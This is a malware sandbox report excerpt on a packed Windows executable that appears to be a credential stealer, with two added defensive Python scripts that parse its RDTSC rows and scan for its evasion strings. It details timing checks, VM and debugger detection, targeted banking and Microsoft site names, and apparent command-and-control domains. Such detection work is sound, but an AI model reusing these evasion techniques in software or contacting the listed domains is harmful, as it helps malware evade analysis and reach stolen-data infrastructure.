Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 570070B second address: 570070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 570070F second address: 5700715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5700715 second address: 5700764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 382BF10Bh 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F65CD2EDEEEh 0x00000017 sbb esi, 3C735F18h 0x0000001d jmp 00007F65CD2EDEEBh 0x00000022 popfd 0x00000023 mov edi, eax 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F65CD2EDEF0h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5700764 second address: 5700776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527C9Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5700776 second address: 57007AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F65CD2EDEF8h 0x00000011 call 00007F65CD2EDEF2h 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 57007AE second address: 57007B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 57007B4 second address: 57007B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 57007B8 second address: 57007C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 57007C8 second address: 57007E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5700882 second address: 5700888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5700888 second address: 570088E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5710B77 second address: 5710B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527C9Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5710B89 second address: 5710BB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [75AF459Ch], 05h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F65CD2EDEF5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5710BB8 second address: 5710BE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F663C8A5AC8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F65CC527C9Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5710BE2 second address: 5710BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5710D17 second address: 5710D5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop eax 0x00000010 pushfd 0x00000011 jmp 00007F65CC527C9Fh 0x00000016 sub cx, 2F2Eh 0x0000001b jmp 00007F65CC527CA9h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5710D5F second address: 5710D64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5720BE7 second address: 5720C0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, ch 0x0000000f mov di, 14FAh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5720C0F second address: 5720C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEF7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5720C2A second address: 5720C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5720C2E second address: 5720C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F65CD2EDEF5h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F65CD2EDEEDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5720C5D second address: 5720CFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 7F1E9812h 0x00000008 call 00007F65CC527CA3h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 pushad 0x00000013 mov di, ax 0x00000016 movzx ecx, bx 0x00000019 popad 0x0000001a mov dword ptr [esp], esi 0x0000001d pushad 0x0000001e push ebx 0x0000001f jmp 00007F65CC527CA2h 0x00000024 pop esi 0x00000025 mov si, bx 0x00000028 popad 0x00000029 mov esi, dword ptr [ebp+0Ch] 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F65CC527CA3h 0x00000033 jmp 00007F65CC527CA3h 0x00000038 popfd 0x00000039 push eax 0x0000003a push edx 0x0000003b pushfd 0x0000003c jmp 00007F65CC527CA6h 0x00000041 jmp 00007F65CC527CA5h 0x00000046 popfd 0x00000047 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5720CFC second address: 5720D1B instructions: 0x00000000 rdtsc 0x00000002 call 00007F65CD2EDEF0h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov di, D1C0h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5720D1B second address: 5720D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5720D1F second address: 5720D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 call 00007F65CD2EDEF5h 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5720D3D second address: 5720DBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007F663C8952FAh 0x00000010 jmp 00007F65CC527C9Eh 0x00000015 cmp dword ptr [75AF459Ch], 05h 0x0000001c jmp 00007F65CC527CA0h 0x00000021 je 00007F663C8AD3AFh 0x00000027 jmp 00007F65CC527CA0h 0x0000002c xchg eax, esi 0x0000002d jmp 00007F65CC527CA0h 0x00000032 push eax 0x00000033 jmp 00007F65CC527C9Bh 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a movzx ecx, dx 0x0000003d push eax 0x0000003e push edx 0x0000003f movsx edi, ax 0x00000042 rdtsc
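The interceptor rows above are the sandbox's record of every rdtsc pair it trapped. Most of them are a handful of push/pop and pushad/popad shuffles between two reads; only a few contain the cmp, test or conditional jump that turns the two timestamps into a decision. The parser below is an example added by the editor, not part of the Joe Sandbox report: it reads rows in the format printed above (four rows from this page are embedded as the constructed sample), splits the instruction listing into (offset, instruction) units, and separates records that carry a compare or conditional branch from pure filler. The "check" versus "filler" rule is an assumption made for this example.

```python
"""Parse Joe Sandbox "RDTSC instruction interceptor" rows and separate the
rdtsc pairs that perform a timing check (a compare or conditional branch
between the two reads) from obfuscation filler."""
import re
from dataclasses import dataclass

# Constructed sample: four interceptor rows copied from the report above.
SAMPLE_ROWS = [
    "RDTSC instruction interceptor: First address: 5700707 second address: 570070B "
    "instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    "RDTSC instruction interceptor: First address: 5710B89 second address: 5710BB8 "
    "instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx "
    "0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax "
    "0x0000000b cmp dword ptr [75AF459Ch], 05h 0x00000012 push eax 0x00000013 push edx "
    "0x00000014 jmp 00007F65CD2EDEF5h 0x00000019 rdtsc",
    "RDTSC instruction interceptor: First address: 5710BB8 second address: 5710BE2 "
    "instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA1h 0x00000007 pop edx "
    "0x00000008 pop eax 0x00000009 je 00007F663C8A5AC8h 0x0000000f push eax "
    "0x00000010 push edx 0x00000011 jmp 00007F65CC527C9Dh 0x00000016 rdtsc",
    "RDTSC instruction interceptor: First address: 5710D17 second address: 5710D5F "
    "instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Dh 0x00000007 pop edx "
    "0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx "
    "0x0000000d pushad 0x0000000e push edx 0x0000000f pop eax 0x00000010 pushfd "
    "0x00000011 jmp 00007F65CC527C9Fh 0x00000016 sub cx, 2F2Eh 0x0000001b jmp 00007F65CC527CA9h "
    "0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc",
]

HEADER_RE = re.compile(
    r"First address:\s*([0-9A-Fa-f]+)\s+second address:\s*([0-9A-Fa-f]+)"
    r"\s+instructions:\s*(.*)$"
)
# One "<offset> <mnemonic operands>" unit; the lookahead stops before the next offset.
INSN_RE = re.compile(r"0x([0-9A-Fa-f]{8})\s+(.*?)(?=\s+0x[0-9A-Fa-f]{8}\s|$)")
COND_JUMP_RE = re.compile(r"^j(?!mp\b)[a-z]+\b")  # je, jne, jb, ... but not jmp


@dataclass
class RdtscRecord:
    first: int      # address of the first rdtsc
    second: int     # address of the second rdtsc
    insns: list     # [(offset, "mnemonic operands"), ...]

    def mnemonics(self):
        return [text.split()[0].lower() for _, text in self.insns]

    def compares(self):
        return [text for _, text in self.insns if text.split()[0].lower() in ("cmp", "test")]

    def conditional_jumps(self):
        return [text for _, text in self.insns if COND_JUMP_RE.match(text.lower())]

    def brackets_rdtsc(self):
        """True when the record really is a pair of rdtsc reads."""
        m = self.mnemonics()
        return len(m) >= 2 and m[0] == "rdtsc" and m[-1] == "rdtsc"

    def kind(self):
        # Assumption for this example: a compare or conditional branch between the
        # two reads marks a real timing check; anything else is filler.
        return "check" if (self.compares() or self.conditional_jumps()) else "filler"


def parse_record(row):
    """Parse one interceptor row; None when the row is not an interceptor record."""
    m = HEADER_RE.search(row)
    if not m:
        return None
    insns = [(int(off, 16), text.strip()) for off, text in INSN_RE.findall(m.group(3))]
    return RdtscRecord(int(m.group(1), 16), int(m.group(2), 16), insns)


def summarize(rows):
    recs = [r for r in map(parse_record, rows) if r and r.brackets_rdtsc()]
    kinds = [r.kind() for r in recs]
    return {
        "records": len(recs),
        "check": kinds.count("check"),
        "filler": kinds.count("filler"),
        "longest": max((len(r.insns) for r in recs), default=0),
    }


if __name__ == "__main__":
    for rec in map(parse_record, SAMPLE_ROWS):
        print(f"{rec.first:08X}->{rec.second:08X} {len(rec.insns):2d} insns {rec.kind():6s} "
              f"{rec.compares() + rec.conditional_jumps()}")
    print(summarize(SAMPLE_ROWS))
```

Run over a saved copy of the whole report, the ratio of filler to check records is a rough measure of how much of the rdtsc traffic is protector-generated junk rather than a deliberate VM test; on the four embedded rows it reports three checks and one filler pair.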
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Special instruction interceptor: First address: FC7824 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Special instruction interceptor: First address: FC7900 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Special instruction interceptor: First address: 11FA55C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\0WO49yZcDA.exe TID: 1476 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\0WO49yZcDA.exe TID: 1476 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: 0WO49yZcDA.exe, 00000000.00000002.2513179164.000000000114C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.0000000006142000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 0WO49yZcDA.exe, 0WO49yZcDA.exe, 00000000.00000003.2360552891.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000002.2513804197.0000000001948000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000002.2514052437.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2412704361.0000000001985000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2360552891.0000000001985000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2412277604.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2503713182.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000002.2514052437.0000000001985000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2412704361.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2503713182.0000000001985000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.0000000006142000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 0WO49yZcDA.exe, 00000000.00000002.2513179164.000000000114C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 0WO49yZcDA.exe, 00000000.00000003.2387371976.000000000613D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: NTICE
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: SICE
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Process queried: DebugPort
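The rows in this section and the sandbox-evasion rows before it come down to a short list of fixed strings: the registry value names SystemBiosVersion and VideoBiosVersion, the DriverDesc of the display-adapter class GUID, the VirtualBox ACPI table path HARDWARE\ACPI\DSDT\VBOX__, the Win32_BIOS and AntiVirusProduct WMI queries, the window class names of OllyDbg and the Sysinternals Process, Registry and File Monitor tools, and the SoftICE device names NTICE, SICE and SIWVID. Two practitioner notes on the evidence: the "Oreans.vxd" and "Software\WinLicense" strings in the same image region are artefacts of the Oreans WinLicense/Themida protector runtime, so at least part of the VM and debugger probing is the protector's rather than the stealer's own code; and the rows pairing site names with "VMware20,11696428655" sit in a read-write region and appear to be credential-store contents the sample read, listed under VM detection only because they contain the word VMware. The scanner below is an editor-added example, not code from the report or from Joe Sandbox. It searches a blob (an unpacked section or memory dump) for these indicators in both ASCII and UTF-16LE, the encoding FindWindowW and CreateFileW arguments actually use and ASCII-only string tools miss; device names are searched in the \\.\NAME form in which CreateFile opens them, and the sample blob is constructed.

```python
"""Static triage: find the VM-detection and anti-debugging artefact strings the
report lists, in ASCII and UTF-16LE, inside an arbitrary byte blob."""
from dataclasses import dataclass

# Indicator strings taken from the report rows above, grouped by what they probe.
# Device names are searched in the "\\.\NAME" form in which CreateFile opens them.
INDICATORS = {
    "vm_registry": [
        "HARDWARE\\ACPI\\DSDT\\VBOX__",
        "SystemBiosVersion",
        "VideoBiosVersion",
        "{4d36e968-e325-11ce-bfc1-08002be10318}",
    ],
    "vm_wmi": ["SELECT * FROM Win32_BIOS"],
    "tool_windows": ["ollydbg", "procmon_window_class", "regmonclass", "filemonclass", "gbdyllo"],
    "debugger_devices": ["\\\\.\\NTICE", "\\\\.\\SICE", "\\\\.\\SIWVID"],
    "av_enum": ["SELECT * FROM AntiVirusProduct", "MsMpEng.exe"],
}

ENCODINGS = (("ascii", "ascii"), ("utf-16le", "utf-16-le"))


@dataclass(frozen=True)
class Hit:
    category: str
    needle: str
    encoding: str
    offset: int


def scan(blob, indicators=INDICATORS):
    """Case-insensitive search for every indicator in both encodings."""
    # bytes.lower() only folds ASCII bytes, which is also correct for the
    # UTF-16LE form of ASCII text (the high byte of each unit stays 0x00).
    hay = blob.lower()
    hits = []
    for category, needles in indicators.items():
        for needle in needles:
            for label, codec in ENCODINGS:
                pat = needle.lower().encode(codec)
                pos = hay.find(pat)
                while pos >= 0:
                    hits.append(Hit(category, needle, label, pos))
                    pos = hay.find(pat, pos + 1)
    return sorted(hits, key=lambda h: h.offset)


def categories(hits):
    """Distinct indicator categories present, sorted."""
    return sorted({h.category for h in hits})


def build_sample_blob():
    """Constructed stand-in for an unpacked section: padding plus a few indicators."""
    return b"".join([
        b"\x00" * 16,
        b"OLLYDBG\x00",                                                # ASCII, upper case
        b"\x90" * 8,
        "procmon_window_class".encode("utf-16-le") + b"\x00\x00",     # wide string
        "\\\\.\\SICE".encode("utf-16-le") + b"\x00\x00",              # wide device path
        b"HARDWARE\\ACPI\\DSDT\\VBOX__\x00",
        b"SELECT * FROM AntiVirusProduct\x00",
        b"\xcc" * 16,
    ])


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_blob()
    for h in scan(data):
        print(f"{h.offset:#08x} {h.category:17s} {h.encoding:8s} {h.needle}")
```

Pass a dumped image region as the first argument to scan it; with no argument it runs on the constructed blob and reports the OllyDbg class name as ASCII and the Process Monitor class name and SoftICE device as UTF-16LE. Matches in a packed file prove nothing until the sample is unpacked, which is why the report's strings come from memory dumps rather than the file on disk.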

HIPS / PFW / Operating System Protection Evasion

Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: rapeflowwj.lat
Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: crosshuaht.lat
Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: sustainskelet.lat
Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: aspecteirs.lat
Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: energyaffai.lat
Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: necklacebudi.lat
Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: discokeyus.lat
